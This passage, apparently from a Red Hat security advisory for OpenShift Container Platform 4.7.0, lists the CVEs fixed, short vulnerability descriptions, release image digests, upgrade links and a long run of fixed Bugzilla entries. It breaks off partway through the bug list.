CVE-2020-10773 CVE-2020-10774 \n                   CVE-2020-10942 CVE-2020-11565 CVE-2020-11668 \n                   CVE-2020-11793 CVE-2020-12465 CVE-2020-12655 \n                   CVE-2020-12659 CVE-2020-12770 CVE-2020-12826 \n                   CVE-2020-13249 CVE-2020-13630 CVE-2020-13631 \n                   CVE-2020-13632 CVE-2020-14019 CVE-2020-14040 \n                   CVE-2020-14381 CVE-2020-14382 CVE-2020-14391 \n                   CVE-2020-14422 CVE-2020-15157 CVE-2020-15503 \n                   CVE-2020-15862 CVE-2020-15999 CVE-2020-16166 \n                   CVE-2020-24490 CVE-2020-24659 CVE-2020-25211 \n                   CVE-2020-25641 CVE-2020-25658 CVE-2020-25661 \n                   CVE-2020-25662 CVE-2020-25681 CVE-2020-25682 \n                   CVE-2020-25683 CVE-2020-25684 CVE-2020-25685 \n                   CVE-2020-25686 CVE-2020-25687 CVE-2020-25694 \n                   CVE-2020-25696 CVE-2020-26160 CVE-2020-27813 \n                   CVE-2020-27846 CVE-2020-28362 CVE-2020-29652 \n                   CVE-2021-2007 CVE-2021-3121 \n=====================================================================\n\n1. Summary:\n\nRed Hat OpenShift Container Platform release 4.7.0 is now available. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.7.0. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHSA-2020:5634\n\nSpace precludes documenting all of the container images in this advisory. \nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel\nease-notes.html\n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.0-x86_64\n\nThe image digest is\nsha256:d74b1cfa81f8c9cc23336aee72d8ae9c9905e62c4874b071317a078c316f8a70\n\n(For s390x architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.0-s390x\n\nThe image digest is\nsha256:a68ca03d87496ddfea0ac26b82af77231583a58a7836b95de85efe5e390ad45d\n\n(For ppc64le architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.0-ppc64le\n\nThe image digest is\nsha256:bc7b04e038c8ff3a33b827f4ee19aa79b26e14c359a7dcc1ced9f3b58e5f1ac6\n\nAll OpenShift Container Platform 4.7 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster\n- -between-minor.html#understanding-upgrade-channels_updating-cluster-between\n- -minor. \n\nSecurity Fix(es):\n\n* crewjam/saml: authentication bypass in saml authentication\n(CVE-2020-27846)\n\n* golang: crypto/ssh: crafted authentication request can lead to nil\npointer dereference (CVE-2020-29652)\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index\nvalidation (CVE-2021-3121)\n\n* nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)\n\n* kubernetes: Secret leaks in kube-controller-manager when using vSphere\nProvider (CVE-2020-8563)\n\n* containernetworking/plugins: IPv6 router advertisements allow for MitM\nattacks on IPv4 clusters (CVE-2020-10749)\n\n* heketi: gluster-block volume password details available in logs\n(CVE-2020-10763)\n\n* golang.org/x/text: possibility to trigger an infinite loop in\nencoding/unicode could lead to crash (CVE-2020-14040)\n\n* jwt-go: access restriction bypass vulnerability (CVE-2020-26160)\n\n* golang-github-gorilla-websocket: integer overflow leads to denial of\nservice (CVE-2020-27813)\n\n* golang: math/big: panic during recursive division of very large numbers\n(CVE-2020-28362)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n3. Solution:\n\nFor OpenShift Container Platform 4.7, see the following documentation,\nwhich\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel\nease-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster\n- -cli.html. \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1620608 - Restoring deployment config with history leads to weird state\n1752220 - [OVN] Network Policy fails to work when project label gets overwritten\n1756096 - Local storage operator should implement must-gather spec\n1756173 - /etc/udev/rules.d/66-azure-storage.rules missing from initramfs\n1768255 - installer reports 100% complete but failing components\n1770017 - Init containers restart when the exited container is removed from node. \n1775057 - [MSTR-485] Cluster is abnormal after etcd backup/restore when the backup is conducted during etcd encryption is migrating\n1775444 - RFE: k8s cpu manager does not restrict /usr/bin/pod cpuset\n1777038 - Cluster scaled beyond host subnet limits does not fire alert or cleanly report why it cannot scale\n1777224 - InfraID in metadata.json and .openshift_install_state.json is not consistent when repeating `create` commands\n1784298 - \"Displaying with reduced resolution due to large dataset.\" would show under some conditions\n1785399 - Under condition of heavy pod creation, creation fails with \u0027error reserving pod name ...: name is reserved\"\n1797766 - Resource Requirements\" specDescriptor fields - CPU and Memory injects empty string YAML editor\n1801089 - [OVN] Installation failed and monitoring pod not created due to some network error. \n1805025 - [OSP] Machine status doesn\u0027t become \"Failed\" when creating a machine with invalid image\n1805639 - Machine status should be \"Failed\" when creating a machine with invalid machine configuration\n1806000 - CRI-O failing with: error reserving ctr name\n1806915 - openshift-service-ca: Some core components are in openshift.io/run-level 1 and are bypassing SCC, but should not be\n1806917 - openshift-service-ca-operator: Some core components are in openshift.io/run-level 1 and are bypassing SCC, but should not be\n1810438 - Installation logs are not gathered from OCP nodes\n1812085 - kubernetes-networking-namespace-pods dashboard doesn\u0027t exist\n1812412 - Monitoring Dashboard: on restricted cluster, query timed out in expression evaluation\n1813012 - EtcdDiscoveryDomain no longer needed\n1813949 - openshift-install doesn\u0027t use env variables for OS_* for some of API endpoints\n1816812 - OpenShift test suites are not resilient to rate limited registries (like docker.io) and cannot control their dependencies for offline use\n1819053 - loading OpenAPI spec for \"v1beta1.metrics.k8s.io\" failed with: OpenAPI spec does not exist\n1819457 - Package Server is in \u0027Cannot update\u0027 status despite properly working\n1820141 - [RFE] deploy qemu-quest-agent on the nodes\n1822744 - OCS Installation CI test flaking\n1824038 - Integration Tests: StaleElementReferenceError in OLM single-installmode scenario\n1825892 - StorageClasses and PVs are not cleaned completely after running the csi verification tool\n1826301 - Wrong NodeStatus reports in file-integrity scan when configuration error in aide.conf file\n1829723 - User workload monitoring alerts fire out of the box\n1832968 - oc adm catalog mirror does not mirror the index image itself\n1833012 - Lower OVNKubernetes HTTP E/W performance compared with OpenShiftSDN\n1833220 - CVE-2020-10749 containernetworking/plugins: IPv6 router advertisements allow for MitM attacks on IPv4 clusters\n1834995 - olmFull suite always fails once th suite is run on the same cluster\n1836017 - vSphere UPI: Both Internal and External load balancers for kube-apiserver should use /readyz\n1837953 - Replacing masters doesn\u0027t work for ovn-kubernetes 4.4\n1838352 - OperatorExited, Pending marketplace-operator-... pod for several weeks\n1838751 - [oVirt][Tracker] Re-enable skipped network tests\n1839239 - csi-snapshot-controller flickers Degraded=True on etcd hiccups\n1840759 - [aws-ebs-csi-driver] The volume created by aws ebs csi driver can not be deleted when the cluster is destroyed\n1841039 - authentication-operator: Add e2e test for password grants to Keycloak being set as OIDC IdP\n1841119 - Get rid of config patches and pass flags directly to kcm\n1841175 - When an Install Plan gets deleted, OLM does not create a new one\n1841381 - Issue with memoryMB validation\n1841885 - oc adm catalog mirror command attempts to pull from registry.redhat.io when using --from-dir option\n1844727 - Etcd container leaves grep and lsof zombie processes\n1845387 - CVE-2020-10763 heketi: gluster-block volume password details available in logs\n1847074 - Filter bar layout issues at some screen widths on search page\n1848358 - CRDs with preserveUnknownFields:true don\u0027t reflect in status that they are non-structural\n1849543 - [4.5]kubeletconfig\u0027s description will show multiple lines for finalizers when upgrade from 4.4.8-\u003e4.5\n1851103 - Use of NetworkManager-wait-online.service in rhcos-growpart.service\n1851203 - [GSS] [RFE] Need a simpler representation of capactiy breakdown in total usage and per project breakdown in OCS 4 dashboard\n1851351 - OCP 4.4.9: EtcdMemberIPMigratorDegraded: rpc error: code = Canceled desc = grpc: the client connection is closing\n1851693 - The `oc apply` should return errors instead of hanging there when failing to create the CRD\n1852289 - Upgrade testsuite fails on ppc64le environment - Unsupported LoadBalancer service\n1853115 - the restriction of --cloud option should be shown in help text. \n1853116 - `--to` option does not work with `--credentials-requests` flag. \n1853352 - [v2v][UI] Storage Class fields Should  Not be empty  in VM  disks view\n1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash\n1854567 - \"Installed Operators\" list showing \"duplicated\" entries during installation\n1855325 - [Feature:Prometheus][Conformance] Prometheus when installed on the cluster [Top Level] [Feature:Prometheus][Conformance] Prometheus when installed on the cluster should report telemetry if a cloud.openshift.com token is present\n1855351 - Inconsistent Installer reactions to Ctrl-C during user input process\n1855408 - OVN cluster unstable after running minimal scale test\n1856351 - Build page should show metrics for when the build ran, not the last 30 minutes\n1856354 - New APIServices missing from OpenAPI definitions\n1857446 - ARO/Azure: excessive pod memory allocation causes node lockup\n1857877 - Operator upgrades can delete existing CSV before completion\n1858578 - [v2v] [ui] VM import RHV to CNV Target VM Name longer than 63 chars should not be allowed\n1859174 - [IPI][OSP] Having errors from 4.3 to 4.6 about Security group rule already created\n1860136 - default ingress does not propagate annotations to route object on update\n1860322 - [OCPv4.5.2] after unexpected shutdown one of RHV Hypervisors, OCP worker nodes machine are marked as \"Failed\"\n1860518 - unable to stop a crio pod\n1861383 - Route with `haproxy.router.openshift.io/timeout: 365d` kills the ingress controller\n1862430 - LSO: PV creation lock should not be acquired in a loop\n1862489 - LSO autoprovisioning should exclude top level disks that are part of LVM volume group. \n1862608 - Virtual media does not work on hosts using BIOS, only UEFI\n1862918 - [v2v] User should only select SRIOV network when importin vm with SRIOV network\n1865743 - Some pods are stuck in ContainerCreating and some sdn pods are in CrashLoopBackOff\n1865839 - rpm-ostree fails with \"System transaction in progress\" when moving to kernel-rt\n1866043 - Configurable table column headers can be illegible\n1866087 - Examining agones helm chart resources results in \"Oh no!\"\n1866261 - Need to indicate the intentional behavior for Ansible in the `create api` help info\n1866298 - [RHOCS Usability Study][Installation] Labeling the namespace should be a part of the installation flow or be clearer as a requirement\n1866320 - [RHOCS Usability Study][Dashboard] Users were confused by Available Capacity and the Total Capacity\n1866334 - [RHOCS Usability Study][Installation] On the Operator installation page, there\u2019s no indication on which labels offer tooltip/help\n1866340 - [RHOCS Usability Study][Dashboard] It was not clear why \u201cNo persistent storage alerts\u201d was prominently displayed\n1866343 - [RHOCS Usability Study][Dashboard] User wanted to know the time frame for Data Consumption, e.g I/O Operations\n1866445 - kola --basic-qemu-scenarios scenario fail on ppc64le \u0026 s390x\n1866482 - Few errors are seen when oc adm must-gather is run\n1866605 - No metadata.generation set for build and buildconfig objects\n1866873 - MCDDrainError \"Drain failed on  , updates may be blocked\" missing rendered node name\n1866901 - Deployment strategy for BMO allows multiple pods to run at the same time\n1866925 - openshift-install destroy cluster should fail quickly when provided with invalid credentials on Azure. \n1867165 - Cannot assign static address to baremetal install bootstrap vm\n1867380 - When using webhooks in OCP 4.5 fails to rollout latest deploymentconfig\n1867400 - [OCs 4.5]UI should not allow creation of second storagecluster of different mode in a single OCS\n1867477 - HPA monitoring cpu utilization fails for deployments which have init containers\n1867518 - [oc] oc should not print so many goroutines when ANY command fails\n1867608 - ds/machine-config-daemon takes 100+ minutes to rollout on  250 node cluster\n1867965 - OpenShift Console Deployment Edit overwrites deployment yaml\n1868004 - opm index add appears to produce image with wrong registry server binary\n1868065 - oc -o jsonpath prints possible warning / bug \"Unable to decode server response into a Table\"\n1868104 - Baremetal actuator should not delete Machine objects\n1868125 - opm index add is not creating an index with valid images when --permissive flag is added, the index is empty instead\n1868384 - CLI does not save login credentials as expected when using the same username in multiple clusters\n1868527 - OpenShift Storage using VMWare vSAN receives error \"Failed to add disk \u0027scsi0:2\u0027\" when mounted pod is created on separate node\n1868645 - After a disaster recovery pods a stuck in \"NodeAffinity\" state and not running\n1868748 - ClusterProvisioningIP in baremetal platform has wrong JSON annotation\n1868765 - [vsphere][ci] could not reserve an IP address: no available addresses\n1868770 - catalogSource named \"redhat-operators\" deleted in a disconnected cluster\n1868976 - Prometheus error opening query log file on EBS backed PVC\n1869293 - The configmap name looks confusing in aide-ds pod logs\n1869606 - crio\u0027s failing to delete a network namespace\n1870337 - [sig-storage] Managed cluster should have no crashlooping recycler pods over four minutes\n1870342 - [sig-scheduling] SchedulerPredicates [Serial] validates resource limits of pods that are allowed to run  [Conformance]\n1870373 - Ingress Operator reports available when DNS fails to provision\n1870467 - D/DC Part of Helm / Operator Backed should not have HPA\n1870728 - openshift-install creates expired ignition files from stale .openshift_install_state.json\n1870800 - [4.6] Managed Column not appearing on Pods Details page\n1871170 - e2e tests are needed to validate the functionality of the etcdctl container\n1872001 - EtcdDiscoveryDomain no longer needed\n1872095 - content are expanded to the whole line when only one column in table on Resource Details page\n1872124 - Could not choose device type as \"disk\" or \"part\" when create localvolumeset from web console\n1872128 - Can\u0027t run container with hostPort on ipv6 cluster\n1872166 - \u0027Silences\u0027 link redirects to unexpected \u0027Alerts\u0027 view after creating a silence in the Developer perspective\n1872251 - [aws-ebs-csi-driver] Verify job in CI doesn\u0027t check for vendor dir sanity\n1872786 - Rules in kube-apiserver.rules are taking too long and consuming too much memory for Prometheus to evaluate them\n1872821 - [DOC] Typo in Ansible Operator Tutorial\n1872907 - Fail to create CR from generated Helm Base Operator\n1872923 - Click \"Cancel\" button on the \"initialization-resource\" creation form page should send users to the \"Operator details\" page instead of \"Install Operator\" page (previous page)\n1873007 - [downstream] failed to read config when running the operator-sdk in the home path\n1873030 - Subscriptions without any candidate operators should cause resolution to fail\n1873043 - Bump to latest available 1.19.x k8s\n1873114 - Nodes goes into NotReady state (VMware)\n1873288 - Changing Cluster-Wide Pull Secret Does Not Trigger Updates In Kubelet Filesystem\n1873305 - Failed to power on /inspect node when using Redfish protocol\n1873326 - Accessibility - The symbols e.g checkmark in the overview page has no text description, label, or other accessible information\n1873480 - Accessibility - No text description, alt text, label, or other accessible information associated with the help icon: \u201c?\u201d button/icon in Developer Console -\u003eNavigation\n1873556 - [Openstack] HTTP_PROXY setting for NetworkManager-resolv-prepender not working\n1873593 - MCO fails to cope with ContainerRuntimeConfig thas has a name \u003e 63 characters\n1874057 - Pod stuck in CreateContainerError - error msg=\"container_linux.go:348: starting container process caused \\\"chdir to cwd (\\\\\\\"/mount-point\\\\\\\") set in config.json failed: permission denied\\\"\"\n1874074 - [CNV] Windows 2019 Default Template Not Defaulting to Proper NIC/Storage Driver\n1874192 - [RFE] \"Create Backing Store\" page doesn\u0027t allow to select already defined k8s secret as target bucket credentials when Google Cloud Storage is selected as a provider\n1874240 - [vsphere] unable to deprovision - Runtime error list attached objects\n1874248 - Include validation for vcenter host in the install-config\n1874340 - vmware: NodeClockNotSynchronising alert is triggered in openshift cluster after upgrading form 4.4.16 to 4.5.6\n1874583 - apiserver tries and fails to log an event when shutting down\n1874584 - add retry for etcd errors in kube-apiserver\n1874638 - Missing logging for nbctl daemon\n1874736 - [downstream] no version info for the helm-operator\n1874901 - add utm_source parameter to Red Hat Marketplace URLs for attribution\n1874968 - Accessibility: The project selection drop down is a keyboard trap\n1875247 - Dependency resolution error \"found more than one head for channel\" is unhelpful for users\n1875516 - disabled scheduling is easy to miss in node page of OCP console\n1875598 - machine status is Running for a master node which has been terminated from the console\n1875806 - When creating a service of type \"LoadBalancer\" (Kuryr,OVN) communication through this loadbalancer failes after 2-5 minutes. \n1876166 - need to be able to disable kube-apiserver connectivity checks\n1876469 - Invalid doc link on yaml template schema description\n1876701 - podCount specDescriptor change doesn\u0027t take effect on operand details page\n1876815 - Installer uses the environment variable OS_CLOUD for manifest generation despite explicit prompt\n1876935 - AWS volume snapshot is not deleted after the cluster is destroyed\n1877071 - vSphere IPI - Nameserver limits were exceeded, some nameservers have been omitted\n1877105 - add redfish to enabled_bios_interfaces\n1877116 - e2e aws calico tests fail with `rpc error: code = ResourceExhausted`\n1877273 - [OVN] EgressIP cannot fail over to available nodes after one egressIP node shutdown\n1877648 - [sriov]VF from allocatable and capacity of node is incorrect when the policy is only \u0027rootDevices\u0027\n1877681 - Manually created PV can not be used\n1877693 - dnsrecords specify recordTTL as 30 but the value is null in AWS Route 53\n1877740 - RHCOS unable to get ip address during first boot\n1877812 - [ROKS] IBM cloud failed to terminate OSDs when upgraded between internal builds of OCS 4.5\n1877919 - panic in multus-admission-controller\n1877924 - Cannot set BIOS config using Redfish with Dell iDracs\n1878022 - Met imagestreamimport error when import the whole image repository\n1878086 - OCP 4.6+OCS 4.6(multiple SC) Internal Mode- UI should populate the default \"Filesystem Name\" instead of providing a textbox, \u0026 the name should be validated\n1878301 - [4.6] [UI] Unschedulable used to always be displayed when Node is Ready status\n1878701 - After deleting and recreating a VM with same name, the VM events contain the events from the old VM\n1878766 - CPU consumption on nodes is higher than the CPU count of the node. \n1878772 - On the nodes there are up to 547 zombie processes caused by thanos and Prometheus. \n1878823 - \"oc adm release mirror\" generating incomplete imageContentSources when using \"--to\" and \"--to-release-image\"\n1878845 - 4.5 to 4.6.rc.4 upgrade failure: authentication operator health check connection refused for multitenant mode\n1878900 - Installer complains about not enough vcpu for the baremetal flavor where generic bm flavor is being used\n1878953 - RBAC error shows when normal user access pvc upload page\n1878956 - `oc api-resources` does not include API version\n1878972 - oc adm release mirror removes the architecture information\n1879013 - [RFE]Improve CD-ROM interface selection\n1879056 - UI should allow to change or unset the evictionStrategy\n1879057 - [CSI Certificate Test] Test failed for CSI certification tests for CSIdriver openshift-storage.rbd.csi.ceph.com with RWX enabled\n1879094 - RHCOS dhcp kernel parameters not working as expected\n1879099 - Extra reboot during 4.5 -\u003e 4.6 upgrade\n1879244 - Error adding container to network \"ipvlan-host-local\": \"master\" field is required\n1879248 - OLM Cert Dir for Webhooks does not align SDK/Kubebuilder\n1879282 - Update OLM references to point to the OLM\u0027s new doc site\n1879283 - panic after nil pointer dereference in pkg/daemon/update.go\n1879365 - Overlapping, divergent openshift-cluster-storage-operator manifests\n1879419 - [RFE]Improve boot source description for \u0027Container\u0027 and \u2018URL\u2019\n1879430 - openshift-object-counts quota is not dynamically updating as the resource is deleted. \n1879565 - IPv6 installation fails on node-valid-hostname\n1879777 - Overlapping, divergent openshift-machine-api namespace manifests\n1879878 - Messages flooded in thanos-querier pod- oauth-proxy container: Authorization header does not start with \u0027Basic\u0027, skipping basic authentication in Log message in thanos-querier pod the oauth-proxy\n1879930 - Annotations shouldn\u0027t be removed during object reconciliation\n1879976 - No other channel visible from console\n1880068 - image pruner is not aware of image policy annotation, StatefulSets, etc. \n1880148 - dns daemonset rolls out slowly in large clusters\n1880161 - Actuator Update calls should have fixed retry time\n1880259 - additional network + OVN network installation failed\n1880389 - Pipeline Runs with skipped Tasks incorrectly show Tasks as \"Failed\"\n1880410 - Convert Pipeline Visualization node to SVG\n1880417 - [vmware] Fail to boot with Secure Boot enabled, kernel lockdown denies iopl access to afterburn\n1880443 - broken machine pool management on OpenStack\n1880450 - Host failed to install because its installation stage joined took longer than expected 20m0s. \n1880473 - IBM Cloudpak operators installation stuck \"UpgradePending\" with InstallPlan status updates failing due to size limitation\n1880680 - [4.3] [Tigera plugin] - openshift-kube-proxy fails - Failed to execute iptables-restore: exit status 4 (iptables-restore v1.8.4 (nf_tables)\n1880785 - CredentialsRequest missing description in `oc explain`\n1880787 - No description for Provisioning CRD for `oc explain`\n1880902 - need dnsPlocy set in crd ingresscontrollers\n1880913 - [DeScheduler] - change loglevel from Info to Error when priority class given in the descheduler params is not present in the cluster\n1881027 - Cluster installation fails at with error :  the container name \\\"assisted-installer\\\" is already in use\n1881046 - [OSP] openstack-cinder-csi-driver-operator doesn\u0027t contain required manifests and assets\n1881155 - operator install authentication: Authentication require functional ingress which requires at least one schedulable and ready node\n1881268 - Image uploading failed but wizard claim the source is available\n1881322 - kube-scheduler not scheduling pods for certificates not renewed automatically after nodes restoration\n1881347 - [v2v][ui]VM Import Wizard does not call Import provider cleanup\n1881881 - unable to specify target port manually resulting in application not reachable\n1881898 - misalignment of sub-title in quick start headers\n1882022 - [vsphere][ipi] directory path is incomplete, terraform can\u0027t find the cluster\n1882057 - Not able to select access modes for snapshot and clone\n1882140 - No description for spec.kubeletConfig\n1882176 - Master recovery instructions don\u0027t handle IP change well\n1882191 - Installation fails against external resources which lack DNS Subject Alternative Name\n1882209 - [ BateMetal IPI ] local coredns resolution not working\n1882210 - [release 4.7] insights-operator: Fix bug in reflector not recovering from \"Too large resource version\"\n1882268 - [e2e][automation]Add Integration Test for Snapshots\n1882361 - Retrieve and expose the latest report for the cluster\n1882485 - dns-node-resolver corrupts /etc/hosts if internal registry is not in use\n1882556 - git:// protocol in origin tests is not currently proxied\n1882569 - CNO: Replacing masters doesn\u0027t work for ovn-kubernetes 4.4\n1882608 - Spot instance not getting created on AzureGovCloud\n1882630 - Fstype is changed after deleting pv provisioned by localvolumeset instance\n1882649 - IPI installer labels all images it uploads into glance as qcow2\n1882653 - The Approval should display the Manual after the APPROVAL changed to Manual from the Automatic\n1882658 - [RFE] Volume Snapshot is not listed under inventory in Project Details page\n1882660 - Operators in a namespace should be installed together when approve one\n1882667 - [ovn] br-ex Link not found when scale up RHEL worker\n1882723 - [vsphere]Suggested mimimum value for providerspec not working\n1882730 - z systems not reporting correct core count in recording rule\n1882750 - [sig-api-machinery][Feature:APIServer][Late] kubelet terminates kube-apiserver gracefully\n1882781 - nameserver= option to dracut creates extra NM connection profile\n1882785 - Multi-Arch CI Jobs destroy libvirt network but occasionally leave it defined\n1882844 - [IPI on vsphere] Executing \u0027openshift-installer destroy cluster\u0027 leaves installer tag categories in vsphere\n1883371 - CVE-2020-26160 jwt-go: access restriction bypass vulnerability\n1883388 - Bare Metal Hosts Details page doesn\u0027t show Mainitenance and Power On/Off status\n1883422 - operator-sdk cleanup fail after installing operator with \"run bundle\" without installmode and og with ownnamespace\n1883425 - Gather top installplans and their count\n1883502 - Logging is broken due to mix of k8s.io/klog v1 and v2\n1883523 - [sig-cli] oc adm must-gather runs successfully for audit logs [Suite:openshift/conformance/parallel]\n1883538 - must gather report \"cannot file manila/aws ebs/ovirt csi related namespaces and objects\" error\n1883560 - operator-registry image needs clean up in /tmp\n1883563 - Creating duplicate namespace from create namespace modal breaks the UI\n1883614 - [OCP 4.6] [UI] UI should not describe power cycle as \"graceful\"\n1883642 - [sig-imageregistry][Feature:ImageTriggers][Serial] ImageStream admission TestImageStreamAdmitSpecUpdate\n1883660 - e2e-metal-ipi CI job consistently failing on 4.4\n1883765 - [user workload monitoring] improve latency of Thanos sidecar  when streaming read requests\n1883766 - [e2e][automation] Adjust tests for UI changes\n1883768 - [user workload monitoring] The Prometheus operator should discard invalid TLS configurations\n1883773 - opm alpha bundle build fails on win10 home\n1883790 - revert \"force cert rotation every couple days for development\" in 4.7\n1883803 - node pull secret feature is not working as expected\n1883836 - Jenkins imagestream ubi8 and nodejs12 update\n1883847 - The UI does not show checkbox for enable encryption at rest for OCS\n1883853 - go list -m all does not work\n1883905 - race condition in opm index add --overwrite-latest\n1883946 - Understand why trident CSI pods are getting deleted by OCP\n1884035 - Pods are illegally transitioning back to pending\n1884041 - e2e should provide error info when minimum number of pods aren\u0027t ready in kube-system namespace\n1884131 - oauth-proxy repository should run tests\n1884165 - Repos should be disabled in -firstboot.service before OS extensions are applied\n1884221 - IO becomes unhealthy due to a file change\n1884258 - Node network alerts should work on ratio rather than absolute values\n1884270 - Git clone does not support SCP-style ssh locations\n1884334 - CVO marks an upgrade as failed when an operator takes more than 20 minutes to rollout\n1884435 - vsphere - loopback is randomly not being added to resolver\n1884565 - oauth-proxy crashes on invalid usage\n1884584 - Kuryr controller continuously restarting due to unable to clean up Network Policy\n1884613 - Create Instance of Prometheus from operator returns blank page for non cluster-admin users\n1884628 - ovs-configuration service fails when the external network is configured on a tagged vlan on top of a bond device on a baremetal IPI deployment\n1884629 - Visusally impaired user using screen reader not able to select Admin/Developer console options in drop down menu. \n1884632 - Adding BYOK disk encryption through DES\n1884654 - Utilization of a VMI is not populated\n1884655 - KeyError on self._existing_vifs[port_id]\n1884664 - Operator install page shows \"installing...\" instead of going to install status page\n1884672 - Failed to inspect hardware. Reason: unable to start inspection: \u0027idrac\u0027\n1884691 - Installer blocks cloud-credential-operator manual mode on GCP and Azure\n1884724 - Quick Start: Serverless quickstart doesn\u0027t match Operator install steps\n1884739 - Node process segfaulted\n1884824 - Update baremetal-operator libraries to k8s 1.19\n1885002 - network kube-rbac-proxy scripts crashloop rather than non-crash looping\n1885138 - Wrong detection of pending state in VM details\n1885151 - [Cloud Team - Cluster API Provider Azure] Logging is broken due to mix of k8s.io/klog v1 and v2\n1885165 - NoRunningOvnMaster alert falsely triggered\n1885170 - Nil pointer when verifying images\n1885173 - [e2e][automation] Add test for next run configuration feature\n1885179 - oc image append fails on push (uploading a new layer)\n1885213 - Vertical Pod Autoscaler (VPA) not working with DeploymentConfig\n1885218 - [e2e][automation] Add virtctl to gating script\n1885223 - Sync with upstream (fix panicking cluster-capacity binary)\n1885235 - Prometheus: Logging is broken due to mix of k8s.io/klog v1 and v2\n1885241 - kube-rbac-proxy: Logging is broken due to mix of k8s.io/klog v1 and v2\n1885243 - prometheus-adapter: Logging is broken due to mix of k8s.io/klog v1 and v2\n1885244 - prometheus-operator: Logging is broken due to mix of k8s.io/klog v1 and v2\n1885246 - cluster-monitoring-operator: Logging is broken due to mix of k8s.io/klog v1 and v2\n1885249 - openshift-state-metrics: Logging is broken due to mix of k8s.io/klog v1 and v2\n1885308 - Supermicro nodes failed to boot via disk during installation when using IPMI and UEFI\n1885315 - unit tests fail on slow disks\n1885319 - Remove redundant use of group and kind of DataVolumeTemplate\n1885343 - Console doesn\u0027t load in iOS Safari when using self-signed certificates\n1885344 - 4.7 upgrade - dummy bug for 1880591\n1885358 - add p\u0026f configuration to protect openshift traffic\n1885365 - MCO does not respect the install section of systemd files when enabling\n1885376 - failed to initialize the cluster: Cluster operator marketplace is still updating\n1885398 - CSV with only Webhook conversion can\u0027t be installed\n1885403 - Some OLM events hide the underlying errors\n1885414 - Need to disable HTX when not using HTTP/2 in order to preserve HTTP header name case\n1885425 - opm index add cannot batch add multiple bundles that use skips\n1885543 - node tuning operator builds and installs an unsigned RPM\n1885644 - Panic output due to timeouts in openshift-apiserver\n1885676 - [OCP 4.7]UI should fallback to minimal deployment only after total CPU \u003c 30 || totalMemory \u003c 72 GiB for initial deployment\n1885702 - Cypress:  Fix \u0027aria-hidden-focus\u0027 accesibility violations\n1885706 - Cypress:  Fix \u0027link-name\u0027 accesibility violation\n1885761 - DNS fails to resolve in some pods\n1885856 - Missing registry v1 protocol usage metric on telemetry\n1885864 - Stalld service crashed under the worker node\n1885930 - [release 4.7] Collect ServiceAccount statistics\n1885940 - kuryr/demo image ping not working\n1886007 - upgrade test with service type load balancer will never work\n1886022 - Move range allocations to CRD\u0027s\n1886028 - [BM][IPI] Failed to delete node after scale down\n1886111 - UpdatingopenshiftStateMetricsFailed: DeploymentRollout of openshift-monitoring/openshift-state-metrics: got 1 unavailable replicas\n1886134 - Need to set GODEBUG=x509ignoreCN=0 in initrd\n1886154 - System roles are not present while trying to create new role binding through web console\n1886166 - 1885517 Clone - Not needed for 4.7 - upgrade from 4.5-\u003e4.6 causes broadcast storm\n1886168 - Remove Terminal Option for Windows Nodes\n1886200 - greenwave / CVP is failing on bundle validations, cannot stage push\n1886229 - Multipath support for RHCOS sysroot\n1886294 - Unable to schedule a pod due to Insufficient ephemeral-storage\n1886327 - Attempt to add a worker using bad roodDeviceHint: bmh and machine become Provisioned, no error in status\n1886353 - [e2e][automation] kubevirt-gating job fails for a missing virtctl URL\n1886397 - Move object-enum to console-shared\n1886423 - New Affinities don\u0027t contain ID until saving\n1886435 - Azure UPI uses deprecated command \u0027group deployment\u0027\n1886449 - p\u0026f: add configuration to protect oauth server traffic\n1886452 - layout options doesn\u0027t gets selected style on click i.e grey background\n1886462 - IO doesn\u0027t recognize namespaces - 2 resources with the same name in 2 namespaces -\u003e only 1 gets collected\n1886488 - move e2e test off of nfs image from docker.io/gmontero/nfs-server:latest\n1886524 - Change default terminal command for Windows Pods\n1886553 - i/o timeout experienced from build02 when targeting CI test cluster during test execution\n1886600 - panic: assignment to entry in nil map\n1886620 - Application behind service load balancer with PDB is not disrupted\n1886627 - Kube-apiserver pods restarting/reinitializing periodically\n1886635 - CVE-2020-8563 kubernetes: Secret leaks in kube-controller-manager when using vSphere Provider\n1886636 - Panic in machine-config-operator\n1886749 - Removing network policy from namespace causes inability to access pods through loadbalancer. \n1886751 - Gather MachineConfigPools\n1886766 - PVC dropdown has \u0027Persistent Volume\u0027 Label\n1886834 - ovn-cert is mandatory in both master and node daemonsets\n1886848 - [OSP] machine instance-state annotation discrepancy with providerStatus.instanceState\n1886861 - ordered-values.yaml not honored if values.schema.json provided\n1886871 - Neutron ports created for hostNetworking pods\n1886890 - Overwrite jenkins-agent-base imagestream\n1886900 - Cluster-version operator fills logs with \"Manifest: ...\" spew\n1886922 - [sig-network] pods should successfully create sandboxes by getting pod\n1886973 - 